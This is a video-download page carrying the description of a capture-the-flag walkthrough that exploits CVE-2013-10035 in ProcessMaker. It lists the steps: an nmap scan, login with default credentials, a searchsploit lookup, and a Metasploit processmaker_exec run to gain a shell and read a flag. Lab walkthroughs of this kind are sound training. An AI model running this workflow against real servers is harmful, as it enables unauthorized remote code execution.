У нас вы можете посмотреть бесплатно Project 127 - Exploiting CVE-2013-10035: Vulnerable Version Of ProcessMaker (CTF Edition) или скачать в максимальном доступном качестве, видео которое было загружено на ютуб. Для загрузки выберите вариант из формы ниже:
Если кнопки скачивания не
загрузились
НАЖМИТЕ ЗДЕСЬ или обновите страницу
Если возникают проблемы со скачиванием видео, пожалуйста напишите в поддержку по адресу внизу
страницы.
Спасибо за использование сервиса ClipSaver.ru
Commands Used (in the order that they appear in the video): 1. nmap -sV 10.4.23.85 2. Opened up a browser and navigated to 10.4.23.85 (to see that an instance of ProcessMaker is being hosted). Finding Version of ProcessMaker In Use 3. Opened up a tab (outside of lab) and Googled “Process Maker default credentials” (to see what the default credentials of process maker is) 4. Clicked Admin menu at the top and clicked Users in the leftmost pane (to view that I am logged in as the administrator) 5. Clicked System Information in the leftmost pane (to see the version of ProcessMaker that is running) Searching for Known Vulnerabilities 6. Went back to terminal and searchsploit ProcessMaker (to search for any ProcessMaker related vulnerabilities) 7. Chose ProcessMaker Open Source – (Authenticated) since I have legitimate credentials to access the application 8. searchsploit ProcessMaker -w (to see the exploit code links) 9. cd Desktop (to switch to Desktop directory) 10. searchsploit -m 29325 (to download a copy of the Ruby exploit script to my Desktop) 11. ls 12. nano 29325.rb 13. rm 29325,rb Exploiting Found Vulnerability 14. service postgresql start && msfconsole 15. workspace -a ProcessMaker 16. setg RHOSTS 10.4.23.85 17. search ProcessMaker 18. use exploit/multi/http/processmaker_exec 19. show options (nothing to configure since default credentials are already set) 20. exploit (may need to set WORKSPACE workflow) 21. pwd 22. cd / 23. ls 24. cat flag.txt